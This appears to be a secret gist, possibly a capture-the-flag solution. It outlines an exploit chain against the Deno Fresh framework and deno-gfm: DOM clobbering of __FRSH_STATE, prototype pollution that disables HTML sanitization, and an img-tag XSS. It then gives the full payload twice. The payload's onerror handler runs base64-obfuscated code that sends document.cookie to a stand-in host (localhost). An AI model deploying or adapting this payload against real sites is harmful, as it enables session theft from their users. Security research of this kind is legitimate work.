icchy/README.md Secret

## README.md

      
    Raw
  

              README.md
            
          
    summary


malicious __FRSH_STATE can be deserialized by DOM clobbering
fresh deserilize function is vulnerable to prototype pollution (https://github.com/denoland/fresh/blob/main/src/runtime/deserializer.ts#L59)
pollute disableHtmlSanitization to bypass sanitize on deno-gfm (https://github.com/denoland/deno-gfm/blob/main/mod.ts#L132-L134)
pass through Marked parser with img attribute tag


## payload.txt
<h1 id="__FRSH_STATE">
{"v":[[{"text":{"_f":"s","v":"\u003cimg src=x onerror=eval(atob(/ZmV0Y2goYC8vbG9jYWxob3N0P2E9JHtlbmNvZGVVUkkoZG9jdW1lbnQuY29va2llKX1gKQ/.source)) /\u003e"},"victim":{},"obj":{},"data":true}],[]],"r":[[["0","0","obj"],["0","0","victim","__proto__","disableHtmlSanitization"]],[["0","0","data"],["0","0","victim","__proto__","disableHtmlSanitization"]]]}
</h1>
	<h1 id="__FRSH_STATE">
	{"v":[[{"text":{"_f":"s","v":"\u003cimg src=x onerror=eval(atob(/ZmV0Y2goYC8vbG9jYWxob3N0P2E9JHtlbmNvZGVVUkkoZG9jdW1lbnQuY29va2llKX1gKQ/.source)) /\u003e"},"victim":{},"obj":{},"data":true}],[]],"r":[[["0","0","obj"],["0","0","victim","__proto__","disableHtmlSanitization"]],[["0","0","data"],["0","0","victim","__proto__","disableHtmlSanitization"]]]}
	</h1>